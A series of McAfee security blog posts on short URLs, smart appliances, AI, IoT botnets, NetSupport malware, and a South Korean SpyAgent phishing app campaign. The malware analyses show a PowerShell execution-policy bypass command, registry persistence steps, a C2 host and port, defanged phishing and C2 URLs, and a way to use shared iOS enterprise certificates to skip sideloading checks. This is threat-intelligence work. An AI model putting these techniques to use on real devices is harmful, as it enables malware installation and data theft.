Phishing attacks, malware, and other types of online fraud can be hidden behind short URLs. Usually, these URLs are distributed via emails, social media, and instant messaging applications. Once clicked, these malicious links can infect a user’s device with malware or lead them to fake websites where sensitive information is collected. This manipulative tactic is known as ‘spoofing’.
→ Dig Deeper: New Malicious Clicker found in apps installed by 20M+ users
The practice of using short URLs has brought about an increased level of vulnerability in cyberspace. Certain security features that help in identifying a malicious website, such as examining the URL structure or the SSL certificate, are effectively nullified by the use of short URLs. As a result, even experienced internet users can fall prey to these malicious tactics. This marks a significant shift in traditional cybersecurity threats, where the danger is now hidden behind the veil of convenience.
→ Dig Deeper: “This Connection Is Not Private” – What it Means and How to Protect Your Privacy
Even more concerning is the fact that once a short URL is generated, it remains active indefinitely. This means a malicious link can continue to exist and pose a threat long after the original malicious activity has been detected and dealt with. Given the scale at which these short URLs are generated and shared across various digital platforms, the potential for harm is vast and hard to contain.
Given the opacity provided by short-URL services, they have become a popular tool among cybercriminals. A report by the cybersecurity firm Symantec found that 87% of the malicious URLs used in massive cyber-attacks were actually short URLs. This stark statistic illustrates the size of the problem at hand and the urgent need for adequate measures to tackle it.
Short URLs are like a wolf in sheep’s clothing. They appear harmless, but the reality could be contrary. Without the ability to inspect the actual URL, users can unknowingly fall into a trap set by online fraudsters. The success of these threats relies heavily on the victim’s ignorance and the inability to determine the authenticity of the link they are clicking on.
To fully comprehend the risks associated with short URLs, let’s examine a few real-life cases where short URLs were used to spread cyber threats. In one instance, a malicious short URL was used to propagate a Facebook scam that promised users a free gift card if they clicked on the link. Instead of a gift card, the link led users to a phishing site designed to steal personal information.
→ Dig Deeper: Don’t Take a Bite out of that Apple Gift Card Scam
In another instance, an email campaign used a short URL to spread the notorious Locky ransomware. The email contained an invoice with a short URL, which when clicked, downloaded the ransomware onto the user’s device. These two cases underscore the severe risks associated with short URLs and highlight the importance of exercising caution when dealing with such links.
While the threats presented by short URLs are real and potentially damaging, internet users are not entirely helpless against them. There are certain measures that can be taken to avoid falling victim to these threats. Below are some of the ways to ensure safe browsing habits:
Firstly, be wary of any strange or unexpected links, even if they come from trusted sources. Cybercriminals often disguise malicious links to appear as though they are from trusted sources, in a tactic known as ‘spoofing’. However, if an email or a message seems out of character or too good to be true, it’s best to avoid clicking on the link.
Secondly, consider using URL expansion services. These services allow you to enter a shortened URL and then reveal the full URL, enabling you to see where the link will take you before you click on it. This can provide an added layer of security when dealing with unfamiliar links.
Finally, keep your devices and internet security software up to date. This is a simple but effective measure against all forms of online threats, including those hidden in short URLs. By regularly updating your devices and software, you can ensure you have the most recent security patches and protections available.
McAfee Pro Tip: Enhance your online safety and privacy by employing a secure browser. A safe browser incorporates additional security features designed to thwart unauthorized third-party activities during your web surfing sessions. Know more about safe browsing.
While individual users can take steps to protect themselves, institutions also have a role to play in mitigating the threats associated with short URLs. Social media platforms, email providers and companies should all be invested in protecting their users from cyber threats. Implementing stricter URL policies, improving spam filters, and educating users about potential dangers can all help in reducing the risk.
Internet service providers can also have a hand in safeguarding users. For instance, they could monitor and block suspicious short URLs, or provide warnings to users about potential threats. While these measures may not completely eliminate the risk, they can greatly reduce the chances of users falling victim to cyber threats.
Moreover, there’s a growing need for regulatory policies around the usage and creation of short URLs. Instituting thorough checks before a short URL is generated could help in curbing the misuse of these services. Such checks could include verifying the authenticity of the original URL and scanning for potential threats.
Short-URL services undeniably offer a degree of convenience in this age of Twitter-length posts and character-limited updates. However, the potential threats that lurk behind these shortened links cannot be overlooked. Users and institutions need to balance the benefits of these services with the risks, and take appropriate measures to safeguard against potential threats.
While we cannot completely eliminate the risks associated with short URLs, by staying informed, exercising caution, and using tools and resources at our disposal, we can significantly reduce our vulnerability to these threats. In the end, it’s about promoting a safer Internet experience for everyone, where convenience doesn’t come at the cost of security.
Stay informed about the latest online threats plaguing the community today. Explore the insights provided by McAfee to arm yourself with the knowledge needed to protect against evolving cybersecurity challenges.
The post Short-URL Services May Hide Threats appeared first on McAfee Blog.
Smart technology has been on the rise, with internet-connected devices becoming increasingly common in our homes. From smart speakers to smart fridges, these devices are designed to make our lives easier and more efficient. However, they also raise new concerns about privacy and security. One device that has been gaining popularity is the smart coffee maker. While it may seem harmless, there are potential risks associated with this seemingly innocuous device.
A smart coffee maker, like other smart appliances, connects to your home network, offering convenience features such as scheduling brew times, remote start, and customization of your coffee preferences. However, this connectivity also opens the door to potential cybersecurity threats. If not properly managed, your smart coffee maker could be brewing up more than just your morning pick-me-up.
The central issue lies in the connectivity of these smart coffee makers. Just like your computer or smartphone, any device that connects to the internet can potentially be hacked. This may result in theft of personal information, disruption of your network, or even malicious use of the device itself. And while a hacked coffee maker might not seem like a big deal, it could be used as a gateway to access other, more sensitive devices on your network.
Many people may not even realize that their smart coffee maker poses a security risk. After all, it doesn’t store personal data like a phone or computer does. However, once it’s connected to your network, it becomes a potential entry point for hackers. And because it’s a relatively new type of device, it might not have the same level of security measures that more well-established smart devices have.
Another serious concern with smart coffee makers and similar devices is privacy. Some smart appliances have microphones, cameras, or other sensors that can monitor your habits and collect data. This data can potentially be sold to advertisers or used for other less-than-ethical purposes.
→ Dig Deeper: What Personal Data Do Companies Track?
Even if your smart coffee maker doesn’t have these features, it still collects data about your coffee habits, such as when you usually make coffee and how much you make. This information, while not as sensitive as personal or financial data, could still be valuable to advertisers and other third parties.
While it might seem far-fetched, hackers can cause a lot of trouble with a compromised coffee maker. One obvious issue is simple annoyance or disruption. A hacker could, for example, repeatedly start the brew cycle at odd hours, wasting coffee and creating a mess. But the potential problems go beyond simple pranks.
A more serious concern is that a hacker could use the coffee maker as a stepping stone to infiltrate the rest of your network. This could potentially give them access to sensitive data stored on other devices, such as personal documents on your computer or personal information stored on your phone. In some cases, they could even take control of other smart devices connected to your network.
The good news is that there are steps you can take to secure your smart coffee maker and other connected devices:
→ McAfee Pro Tip: Be cautious when downloading apps, especially third-party ones. Certain applications might contain malware or viruses that pose a threat to your device’s security.
While consumers have a responsibility to use their devices securely, manufacturers also have a role to play in improving the security of smart appliances. They can, for instance, design devices with security in mind from the outset. This could involve using secure coding practices and running through security tests before releasing a product. Manufacturers can also provide timely updates and clear instructions on how to apply them.
Manufacturers should also be transparent about what data their devices collect and how it’s used. If a device collects data, the manufacturer should provide clear information about this in the product’s privacy policy. They should also give users the ability to opt out of data collection if they choose.
→ Dig Deeper: The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers
Smart coffee makers, like all connected devices, come with potential security and privacy risks. However, the convenience and efficiencies they offer can make them an attractive addition to your home. With a combination of diligent security practices on the part of the user and responsible design and transparency from manufacturers, these risks can be managed.
Despite the potential issues, this doesn’t mean you should be afraid to use a smart coffee maker or other smart devices. Instead, be aware of the risks and take proactive steps to protect yourself and your data. Whether it’s changing the default password, regularly updating the firmware, or researching before buying, these simple steps can go a long way toward safeguarding your smart home. After all, a warm cup of coffee in the morning should be a comfort, not a cause for concern.
The post Your Smart Coffee Maker is Brewing Up Trouble appeared first on McAfee Blog.
NetSupport malware variants have been a persistent threat, demonstrating adaptability and evolving infection techniques. In this technical analysis, we delve into the infection chain, technical intricacies, and IOCs (Indicators of Compromise) of distinct NetSupport variants.
The following is a heatmap depicting the current prevalence of NetSupport in the field. This malware is spreading across the United States and Canada, signifying its geographical reach.
Figure 1 : NetSupport Heat Map
McAfee Labs recently identified a new variation of NetSupport malware, which was distributed through JavaScript, highlighting the evolving tactics employed by cybercriminals.
Infection Chain
Figure 2 : Infection Chain
This Variant starts with a very long JS file. It follows an intricate infection chain, utilizing PowerShell commands. Key steps include changing the directory to the user’s AppData, setting variables, downloading files, and eventually executing ‘client32.exe’. This executable establishes control over the compromised system and registers for auto-startup through Windows Registry, following which the ‘client32.exe’ binary is placed in the ‘MsEdgeSandbox’ folder under AppData, providing persistence.
The JS code looks like as shown in the picture below. Attackers leverage obfuscated JavaScript files as the starting point of an infection chain. These files are designed to bypass security mechanisms and initiate the delivery of malicious payloads.
Figure 3: Encoded Java Script File
It contains a long list of string literals, each consisting of random characters and sequences of letters. These strings are typically used for various purposes in the code, such as constructing URLs, setting values for variables, or possibly for other purposes. The code defines several variables (hy, hY, hE, hi) and a function named ‘y’.
Figure 4 : Encoded Java Script File
Figure 5 : Encoded Java Script File
Figure 6 : Encoded Java Script File
The script shown in the AMSI buffer dumps in Figure 7, begins by changing the directory to the user’s AppData folder. It then sets up variables and proceeds to download and execute files. If certain commands are unavailable, it uses ‘bitsadmin’ for file downloads. The script ensures persistence by altering directory attributes, launching ‘client32.exe,’ and adding a Windows registry entry for automatic execution.
Figure 7 : AMSI Dump
Figure 8 : Code block
Figure 9 : Code block
Figure 10 : Code block
Figure 11 : Code block
Variant 2 of this malware shares a similar infection chain as Variant 1. Like Variant 1, it starts with obfuscated but different JavaScript files and subsequently invokes PowerShell. However, what sets Variant 2 apart is its distinct approach to manipulating files and content. It downloads a text file from a website, decodes base64-encoded data, and creates a ZIP file with potentially malicious content. Variant 2 differs significantly when it comes to file manipulation. Instead of placing the ‘client32.exe’ in the ‘MsEdgeSandbox’ folder like Variant 1, it follows an alternative path. In this case, it establishes the ‘client32.exe’ in a folder labeled ‘D’ under AppData. This distinct approach to file placement sets it apart from Variant 1, despite the shared initial infection chain.
The JS file as shown in Figure 12, includes two variables, ‘F4f’ and ‘EQGMUD.’ ‘F4f’ is set to a specific value, 140743580. ‘EQGMUD’ is a bit more complex; it’s a string formed by converting numerical values into characters. These values are derived by subtracting ‘F4f’ (140743580) from them. Finally, the ‘eval’ function is used to run the code stored in ‘EQGMUD’ as JavaScript, essentially executing this string as a script.
Figure 12 : Encoded Java Script File
The AMSI buffer dumps as shown in Figure 13, contains PowerShell commands that perform several actions, including downloading a file from the internet, extracting it, and making changes to the windows registry.
Figure 13 : AMSI Dump
Figure 14 : Directory Created
Figure 15 : Process Tree
Once the JavaScript file is executed, it launches wscript.exe and then launches PowerShell with the following command.
powershell.exe -ExecutionPolicy Bypass -V
Figure 16 : PowerShell Command
This way, PowerShell with the execution policy set to “Bypass”, which means that PowerShell will not enforce any execution restrictions. This allows scripts to run without any policy-related restrictions.
This malware is known for its persistence and attempts to hide within the user’s profile directories, which makes it challenging to remove.
It creates a “MsEdgeSandbox” folder in AppData in the first variant and downloads the following files in that folder.
Figure 17 : Created Directory
Various installation paths were seen in different variants.
C:\Users\user\AppData\Roaming\Apple2q6lxy6v\client32.exe
C:\Users\user\AppData\Roaming\Apple2q6lxy6v\client32.exe
C:\Users\user\AppData\Roaming\Apple2abm1oct\client32.exe
C:\Users\user\AppData\Roaming\Apple2w35hfwm7\client32.exe
C:\Users\user>\AppData\Roaming\Apple2abm1oct\client32.exe
c:\users\user\appdata\roaming\apple2u8g65jb\client32.exe
C:\Users\user\AppData\Roaming\Apple22w3r7sx\client32.exe
C:\Users\user\AppData\Roaming\Apple2hnrvoo\client32.exe
C:\Users\user\AppData\Roaming\Apple2kvu25\client32.exe
C:\Users\user\AppData\Roaming\Apple25aoyh\client32.exe
C:\Users\user\AppData\Roaming\Apple2i262cp\client32.exe
C:\Users\user\AppData\Roaming\Apple2hnrvoo\client32.exe
C:\Users\user\AppData\Roaming\Apple2g057yi\client32.exe
C:\Users\user\AppData\Roaming\Apple22fu82\client32.exe
C:\Users\user\AppData\Roaming\Apple25aoyh\client32.exe
C:\Users\user\AppData\Roaming\Apple2kvu25\client32.exe
C:\Users\user\AppData\Roaming\Apple22fu82\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_5frlv9\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_y8yyxp\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_v8qm4f\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_y44ztr\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_joafqo\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_ncfy5n\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_v8qm4f\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_y44ztr\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_y8yyxp\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_ncfy5n\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_joafqo\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_5frlv9\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_z8yde3x\client32.exe
C:\Users\user\AppData\Roaming\ Apple2_z8yde3x\client32.exe
C:\Users\user\AppData\Local\Temp\o2pi4q4o.i1y\client32.exe
c:\users\user \appdata\roaming\d\client32.exe
C:\Users\user\AppData\Roaming\D\client32.exe
client32
c:\users\user\appdata\roaming\d\client32.exe
C:\Program Files (x86)\NetSupport\NetSupport DNA\Client\dnarc.exe
c:\program files (x86)\netsupport\netsupport dna\client\dnarc.exe
Figure 18 : File Signature
Client32.ini: This file contains the configuration settings for NetSupport Manager. It governs how NetSupport Manager interacts with managed hosts and allows operators to configure various options.
NSM.LIC: The LIC file contains license details related to the NetSupport Manager installation, which are essential for proper licensing and software activation.
Figure 19 : INI File
jokosampbulid1.com:1412
Domain: jokosampbulid1.com
Port: 1412
C2
Figure 20 : C2 Communication
Figure 21 : HXXP Stream
The analysis of NetSupport malware variants has revealed a persistent and continually evolving threat landscape. These variants employ intricate infection chains and technical intricacies to accomplish their malicious goals. Our investigation has provided insights into their modus operandi, including downloading, and executing files through obfuscated JavaScript code and altering the Windows Registry for persistence.
At McAfee Labs, our commitment is unwavering. We strive to provide robust and effective threat defense mechanisms to safeguard our users from a wide array of threats, including NetSupport and its various iterations. Our security software harnesses the power of signature-based, machine learning, threat intelligence, and behavior-based detection techniques, all working together to identify and thwart threats effectively. In an ever-changing digital landscape, our focus remains on keeping you safe and secure from emerging threats.
Type | SHA256 |
JS | 5ffb5e9942492f15460e58660dd121b31d4065a133a6f8461554ea8af5c407aa |
EXE | 89F0C8F170FE9EA28B1056517160E92E2D7D4E8AA81F4ED696932230413A6CE1 |
URL | hxxp://45[.]15[.]158[.]212/fakeurl.htm |
Type | SHA256 |
JS | 48bc766326068e078cf258dea70d49dcce265e4e6dbf18f1a0ce28d310f6a89a
73e0975c94ebcdec46fd23664ccecf8953dd70eea1f4e5813e7f8cd8d2dbc4f9 |
URL | hxxps://svirtual[.]sanviatorperu[.]edu[.]pe/readme.txt |
The post Beneath the Surface: How Hackers Turn NetSupport Against Users appeared first on McAfee Blog.
When we come across the term Artificial Intelligence (AI), our mind often ventures into the realm of sci-fi movies like I, Robot, Matrix, and Ex Machina. We’ve always perceived AI as a futuristic concept, something that’s happening in a galaxy far, far away. However, AI is not only here in our present but has also been a part of our lives for several years in the form of various technological devices and applications.
In our day-to-day lives, we use AI in many instances without even realizing it. AI has permeated into our homes, our workplaces, and is at our fingertips through our smartphones. From cell phones with built-in smart assistants to home assistants that carry out voice commands, from social networks that determine what content we see to music apps that curate playlists based on our preferences, AI has its footprints everywhere. Therefore, it’s integral to not only embrace the wows of this impressive technology but also understand and discuss the potential risks associated with it.
→ Dig Deeper: Artificial Imposters—Cybercriminals Turn to AI Voice Cloning for a New Breed of Scam
AI, a term that might sound intimidating to many, is not so when we understand it. It is essentially technology that can be programmed to achieve certain goals without assistance. In simple words, it’s a computer’s ability to predict, process data, evaluate it, and take necessary action. This smart way of performing tasks is being implemented in education, business, manufacturing, retail, transportation, and almost every other industry and cultural sector you can think of.
AI has been doing a lot of good too. For instance, Instagram, the second most popular social network, is now deploying AI technology to detect and combat cyberbullying in both comments and photos. No doubt, AI is having a significant impact on everyday life and is poised to metamorphose the future landscape. However, alongside its benefits, AI has brought forward a set of new challenges and risks. From self-driving cars malfunctioning to potential jobs lost to AI robots, from fake videos and images to privacy breaches, the concerns are real and need timely discussions and preventive measures.
AI has made it easier for people to face-swap within images and videos, leading to “deep fake” videos that appear remarkably realistic and often go viral. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. While this displays the power of AI technology, it also brings to light the responsibility and critical thinking required when consuming and sharing online content.
→ Dig Deeper: The Future of Technology: AI, Deepfake, & Connected Devices
Yet another concern raised by AI is privacy breaches. The Cambridge Analytica/Facebook scandal of 2018, alleged to have used AI technology unethically to collect Facebook user data, serves as a reminder that our private (and public) information can be exploited for financial or political gain. Thus, it becomes crucial to discuss and take necessary steps like locking down privacy settings on social networks and being mindful of the information shared in the public feed, including reactions and comments on other content.
McAfee Pro Tip: Cybercriminals employ advanced methods to deceive individuals, propagating sensationalized fake news, creating deceptive catfish dating profiles, and orchestrating harmful impersonations. Recognizing sophisticated AI-generated content can pose a challenge, but certain indicators may signal that you’re encountering a dubious image or interacting with a perpetrator operating behind an AI-generated profile. Know the indicators.
With the advent of AI, cybercrime has found a new ally. As per McAfee’s Threats Prediction Report, AI technology might enable hackers to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activities. Moreover, AI-generated phishing emails are scamming people into unknowingly handing over sensitive data.
→ Dig Deeper: How to Keep Your Data Safe From the Latest Phishing Scam
Bogus emails are becoming highly personalized and can trick intelligent users into clicking malicious links. Given the sophistication of these AI-related scams, it is vital to constantly remind ourselves and our families to be cautious with every click, even those from known sources. The need to be alert and informed cannot be overstressed, especially in times when AI and cybercrime often seem to be two sides of the same coin.
As homes evolve to be smarter and synced with AI-powered Internet of Things (IoT) products, potential threats have proliferated. These threats are not limited to computers and smartphones but extend to AI-enabled devices such as voice-activated assistants. According to McAfee’s Threat Prediction Report, these IoT devices are particularly susceptible as points of entry for cybercriminals. Other devices at risk, as highlighted by security experts, include routers, and tablets.
This means we need to secure all our connected devices and home internet at its source – the network. Routers provided by your ISP (Internet Security Provider) are often less secure, so consider purchasing your own. As a primary step, ensure that all your devices are updated regularly. More importantly, change the default password on these devices and secure your primary network along with your guest network with strong passwords.
Having an open dialogue about AI and its implications is key to navigating through the intricacies of this technology. Parents need to have open discussions with kids about the positives and negatives of AI technology. When discussing fake videos and images, emphasize the importance of critical thinking before sharing any content online. Possibly, even introduce them to the desktop application FakeApp, which allows users to swap faces within images and videos seamlessly, leading to the production of deep fake photos and videos. These can appear remarkably realistic and often go viral.
Privacy is another critical area for discussion. After the Cambridge Analytica/Facebook scandal of 2018, the conversation about privacy breaches has become more significant. These incidents remind us how our private (and public) information can be misused for financial or political gain. Locking down privacy settings, being mindful of the information shared, and understanding the implications of reactions and comments are all topics worth discussing.
Awareness and knowledge are the best tools against AI-enabled cybercrime. Making families understand that bogus emails can now be highly personalized and can trick even the most tech-savvy users into clicking malicious links is essential. AI can generate phishing emails, scamming people into handing over sensitive data. In this context, constant reminders to be cautious with every click, even those from known sources, are necessary.
→ Dig Deeper: Malicious Websites – The Web is a Dangerous Place
The advent of AI has also likely allowed hackers to bypass security measures on networks undetected, leading to data breaches, malware attacks, and ransomware. Therefore, being alert and informed is more than just a precaution – it is a vital safety measure in the digital age.
Artificial Intelligence has indeed woven itself into our everyday lives, making things more convenient, efficient, and connected. However, with these advancements come potential risks and challenges. From privacy breaches, and fake content, to AI-enabled cybercrime, the concerns are real and need our full attention. By understanding AI better, having open discussions, and taking appropriate security measures, we can leverage this technology’s immense potential without falling prey to its risks. In our AI-driven world, being informed, aware, and proactive is the key to staying safe and secure.
To safeguard and fortify your online identity, we strongly recommend that you delve into the extensive array of protective features offered by McAfee+. This comprehensive cybersecurity solution is designed to provide you with a robust defense against a wide spectrum of digital threats, ranging from malware and phishing attacks to data breaches and identity theft.
The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blog.
Recent Internet attacks have caused several popular sites to become unreachable. These include Twitter, Etsy, Spotify, Airbnb, Github, and The New York Times. These incidents have highlighted a new threat to online services: botnets powered by the Internet of Things (IoT). Distributed denial of service (DDoS) attacks have been around for over a decade and, for the most part, have been handled by network providers’ security services. However, the landscape is changing.
The primary strategy in these attacks is to control a number of devices which then simultaneously flood a destination with network requests. The target becomes overloaded and legitimate requests cannot be processed. Traditional network filters typically handle this by recognizing and blocking systems exhibiting this malicious behavior. However, when thousands of systems mount an attack, these traditional filters fail to differentiate between legitimate and malicious traffic, causing system availability to crumble.
Cybercriminals and hacktivists have found a new weapon in this war: the IoT. Billions of IoT devices exist, ranging in size from a piece of jewelry to a tractor. These devices all have one thing in common: they connect to the internet. While this connection offers tremendous benefits, such as allowing users to monitor their homes or check the contents of their refrigerators remotely, it also presents a significant risk. For hackers, each IoT device represents a potential recruit for their bot armies.
A recent attack against a major DNS provider shed light on this vulnerability. Botnets containing tens or hundreds of thousands of hijacked IoT devices have the potential to bring down significant sections of the internet. Over the coming months, we’ll likely discover just how formidable a threat these devices pose. For now, let’s dig into the key aspects of recent IoT DDoS attacks.
The proliferation of Internet of Things (IoT) devices has ushered in a new era of digital convenience, but it has also opened the floodgates to a range of cybersecurity concerns. To navigate the complexities of this digital landscape, it’s essential to grasp five key points:
Each device that can be hacked is a potential soldier for a botnet army, which could be used to disrupt essential parts of the internet. Such attacks can interfere with your favorite sites for streaming, socializing, shopping, healthcare, education, banking, and more. They have the potential to undermine the very foundations of our digital society. This underscores the need for proactive measures to protect our digital way of life and ensure the continued availability of essential services that have become integral to modern living.
→Dig Deeper: How Valuable Is Your Health Care Data?
Hackers will fight to retain control over them. Though the malware used in the Mirai botnets is simple, it will evolve as quickly as necessary to allow attackers to maintain control. IoT devices are significantly valuable to hackers as they can enact devastating DDoS attacks with minimal effort. As we embrace the convenience of IoT, we must also grapple with the responsibility of securing these devices to maintain the integrity and resilience of our increasingly digitized way of life.
Identifying and mitigating attacks from a handful of systems is manageable. However, when tens or hundreds of thousands of devices are involved, it becomes nearly impossible. The resources required to defend against such an attack are immense and expensive. For instance, a recent attack that aimed to incapacitate Brian Krebs’ security-reporting site led to Akamai’s Vice President of Web Security stating that if such attacks were sustained, they could easily cost millions in cybersecurity services to keep the site available. Attackers are unlikely to give up these always-connected devices that are ideal for forming powerful DDoS botnets.
There’s been speculation that nation-states are behind some of these attacks, but this is highly unlikely. The authors of Mirai, a prominent botnet, willingly released their code to the public, something a governmental organization would almost certainly not do. However, it’s plausible that after observing the power of IoT botnets, nation-states are developing similar strategies—ones with even more advanced capabilities. In the short term, however, cybercriminals and hacktivists will continue to be the primary drivers of these attacks.
→ Dig Deeper: Mirai Botnet Creates Army of IoT Orcs
In the coming months, it’s expected that criminals will discover ways to profit from these attacks, such as through extortion. The authors of Mirai voluntarily released their code to the public—an action unlikely from a government-backed team. However, the effectiveness of IoT botnets hasn’t gone unnoticed, and it’s a good bet that nation-states are already working on similar strategies but with significantly more advanced capabilities.
Over time, expect cybercriminals and hacktivists to remain the main culprits behind these attacks. In the immediate future, these groups will continue to exploit insecure IoT devices to enact devastating DDoS attacks, constantly evolving their methods to stay ahead of defenses.
→ Dig Deeper: Hacktivists Turn to Phishing to Fund Their Causes
Unfortunately, the majority of IoT devices lack robust security defenses. The devices currently being targeted are the most vulnerable, many of which have default passwords easily accessible online. Unless the owner changes the default password, hackers can quickly and easily gain control of these devices. With each device they compromise, they gain another soldier for their botnet.
To improve this situation, several factors must be addressed. Devices must be designed with security at the forefront; they must be configured correctly and continuously managed to keep their security up-to-date. This will require both technical advancements and behavioral changes to stay in line with the evolving tactics of hackers.
McAfee Pro Tip: Software updates not only enhance security but also bring new features, better compatibility, stability improvements, and feature removal. While frequent update reminders can be bothersome, they ultimately enhance the user experience, ensuring you make the most of your technology. Know more about the importance of software updates.
Securing IoT devices is now a critical issue for everyone. The sheer number of IoT devices, combined with their vulnerability, provides cybercriminals and hacktivists with a vast pool of resources to fuel potent DDoS campaigns. We are just beginning to observe the attacks and issues surrounding IoT security. Until the implementation of comprehensive controls and responsible behaviors becomes commonplace, we will continue to face these challenges. By understanding these issues, we take the first steps toward a more secure future.
Take more steps with McAfee to secure your digital future. Explore our security solutions or read our cybersecurity blogs and reports.
The post Top 5 Things to Know About Recent IoT Attacks appeared first on McAfee Blog.
Authored by Dexter Shin
Most people have smartphones these days which can be used to easily search for various topics of interest on the Internet. These topics could be about enhancing their privacy, staying fit with activities like Pilates or yoga, or even finding new people to talk to. So, companies create mobile applications to make it more convenient for users and advertise these apps on their websites. But is it safe to download these advertised applications through website searches?
McAfee Mobile Research Team recently observed a malicious Android and iOS information stealer application delivered via phishing sites. This malware became active in early October and has been observed installed on more than 200 devices, according to McAfee’s telemetry. All of these devices are located in South Korea. Considering that all the distribution phishing sites are active at the time of writing this blog post, it is expected that the number of affected devices will continue to increase.
The malware author selects a service that people might find interesting and attracts victims by disguising their service. They also create phishing sites that use the resources of legitimate sites, making them appear identical and tricking users into thinking that they are the official website of the application they want to install. The phishing site also provides Android and iOS versions of the malicious application. When users eventually download and run the app through this phishing site, their contact information and SMS messages are sent to the malware author. McAfee Mobile Security detects this threat as Android/SpyAgent. For more information, visit McAfee Mobile Security.
How to distribute
We recently introduced SpyNote through a phishing campaign targeting Japan. After we found this malware and confirmed that it was targeting South Korea, we suspected it was also distributed through a phishing campaign. So we researched several communities in Korea. One of them, called Arca Live, we were able to confirm their exact distribution method.
They initially approach victims via SMS message. At this stage, the scammers pretend to be women and send seductive messages with photos. After a bit of conversation, they try to move the stage to LINE messenger. After moving to LINE Messenger, the scammer becomes more aggressive. They send victims a link to make a video call and said that it should only be done using an app that prevents capture. That link is a phishing site where malicious apps will be downloaded.
Figure 1. Distribute phishing sites from LINE messenger after moving from SMS (Red text: Scammer, Blue text: Victim)
What do phishing sites do
One of the phishing sites disguises as Camtalk, a legitimate social networking app available on the Google Play Store and Apple App Store, to trick users into downloading malicious Android and iOS applications from remote servers. It uses the same text, layout, and buttons as the legitimate Camtalk website, but instead of redirecting users to the official app store, it forces them to download the malicious application directly:
Figure 2. Comparison of legitimate site (Left) and phishing site (Right)
In addition to pretending to be a social networking app, malware authors behind this campaign also use other different themes in their phishing sites. For example, the app in first picture below offers cloud-based storage for photos and expanded functions than a default album app such as the ability to protect desired albums by setting a password. And the apps in the second and third pictures are yoga and fitness, enticing users with topics that can be easily searched nearby. The important point is normally these types of apps do not require permission to access SMS and contacts.
Figure 3.Many phishing sites in various fields
All phishing sites we found are hosted on the same IP address and they encourage users to download the app by clicking on the Google Play icon or the App Store icon.
Figure 4. Flow for downloading malicious app files
When users click the store button for their devices, their devices begin downloading the type of file (Android APK or iOS IPA) appropriate for each device from a remote server rather than the official app store. And then devices ask users to install it.
Figure 5. The process of app installation on Android
Figure 6. The process of app installation on iOS
How to sign iOS malware
iOS has more restrictive policies regarding sideloading compared to Android. On iOS devices, if an app is not signed with a legitimate developer’s signature or certificate, it must be manually allowed. This applies when attempting to install apps on iOS devices from sources other than the official app store. So, additional steps are required for an app to be installed.
Figure 7. Need to verify developer certificate on iOS
However, this iOS malware attempts to bypass this process using unique methods. Some iPhone users want to download apps through 3rd party stores rather than Apple App Store. There are many types of stores and tools on the Internet, but one of them is called Scarlet. The store shares enterprise certificates, making it easy for developers or crackers who want to use the store to share their apps with users. In other words, since users have already set the certificate to ‘Trust’ when installing the app called Scarlet, other apps using the same certificate installed afterward will be automatically verified.
Figure 8. App automatically verified after installation of 3rd party store
Their enterprise certificates can be easily downloaded by general users as well.
Figure 9. Enterprise certificate shared via messenger
The iOS malware is using these certificates. So, for devices that already have the certificate trusted using Scarlet, no additional steps are required to execute this malware. Once installed, the app can be run at any time.
Figure 10. Automatic verification and executable app
What do they want
These apps all have the same code, just the application name and icon are different. In case of Android, they require permissions to read your contacts and SMS.
Figure 11. Malicious app required sensitive permissions (Android)
In getDeviceInfo() function, android_id and the victim device’s phone number are sent to the C2 server for the purpose of identifying each device. Subsequently, in the following function, all user’s contact information and SMS messages are sent to the C2 server.
Figure 12. Sensitive data stolen by malware (Android)
And in case of iOS, they only require permission to read your contacts. And it requires the user to input their phone number to enter the chat room. Of course, this is done to identify the victim on the C2 server.
Figure 13. Malicious app required sensitive permissions (iOS)
Similarly to Android, there is code within iOS that collects contact information and the data is sent to the C2 server.
Figure 14. Sensitive data stolen by malware (iOS)
Conclusion
The focus of this ongoing campaign is targeting South Korea and there are 10 phishing sites discovered so far. This campaign can potentially be used for other malicious purposes since it steals the victim’s phone number, associated contacts, and SMS messages. So, users should consider all potential threats related to this, as the data targeted by the malware author is clear, and changes can be made to the known aspects so far.
Users should remain cautious, even if they believe they are on an official website. If the app installation does not occur through Google Play Store or Apple App Store, suspicion is warranted. Furthermore, users should always verify when the app requests permissions that seem unrelated to its intended purpose. Because it is difficult for users to actively deal with all these threats, we strongly recommend that users should install security software on their devices and always keep up to date. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience.
Indicators of Compromise (IOCs)
Indicators | Indicator Type | Description |
hxxps://jinyoga[.]shop/ | URL | Phishing site |
hxxps://mysecret-album[.]com/ | URL | Phishing site |
hxxps://pilatesyoaa[.]com/ | URL | Phishing site |
hxxps://sweetchat19[.]com/ | URL | Phishing site |
hxxps://sweetchat23[.]com/ | URL | Phishing site |
hxxps://telegraming[.]pro/ | URL | Phishing site |
hxxps://dl.yoga-jin[.]com/ | URL | Phishing site |
hxxps://aromyoga[.]com/ | URL | Phishing site |
hxxps://swim-talk[.]com/ | URL | Phishing site |
hxxps://spykorea[.]shop/ | URL | Phishing site |
hxxps://api.sweetchat23[.]com/ | URL | C2 server |
hxxps://somaonvip[.]com/ | URL | C2 server |
ed0166fad985d252ae9c92377d6a85025e9b49cafdc06d652107e55dd137f3b2 | SHA256 | Android APK |
2b62d3c5f552d32265aa4fb87392292474a1c3cd7f7c10fa24fb5d486f9f7665 | SHA256 | Android APK |
4bc1b594f4e6702088cbfd035c4331a52ff22b48295a1dd130b0c0a6d41636c9 | SHA256 | Android APK |
bb614273d75b1709e62ce764d026c287aad1fdb1b5c35d18b45324c32e666e19 | SHA256 | Android APK |
